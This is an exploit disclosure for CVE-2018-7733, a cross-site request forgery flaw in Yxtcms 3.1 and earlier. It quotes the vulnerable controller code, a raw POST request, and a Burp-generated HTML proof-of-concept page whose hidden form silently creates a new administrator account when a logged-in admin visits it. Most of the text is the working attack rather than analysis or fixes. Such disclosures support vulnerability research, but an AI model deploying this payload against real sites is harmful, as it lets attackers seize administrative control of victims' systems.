# By Li ZaiTang
	CVE-2018-7733
'''
Attackers can simulate the form sent to the administrator through the CSRF vulnerability attacker can add any administrator information
Source: 
	RbacController.class.php:37-47
		if (IS_POST) {
    		if ($this->role_model->create()) {
    			if ($this->role_model->add()!==false) {
    				$this->success("添加角色成功",U("rbac/index"));
    			} else {
    				$this->error("添加失败！");
    			}
    		} else {
    			$this->error($this->role_model->getError());
    		}
    	}

	Affected software:Yxtcms <=3.1
	Software Link: http://down.admin5.com/php/133101.html

'''
exploit:
127.0.0.1/index.php/admin/user/add_post.html
POST 
user_login=CSRF_TEST&user_pass=CSRF_TEST&user_email=csrf%40163.com&role_id%5B%5D=1

POC:
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/index.php/admin/user/add_post.html" method="POST">
      <input type="hidden" name="user&#95;login" value="CSRF&#95;TEST" />
      <input type="hidden" name="user&#95;pass" value="CSRF&#95;TEST" />
      <input type="hidden" name="user&#95;email" value="csrf&#64;163&#46;com" />
      <input type="hidden" name="role&#95;id&#91;&#93;" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
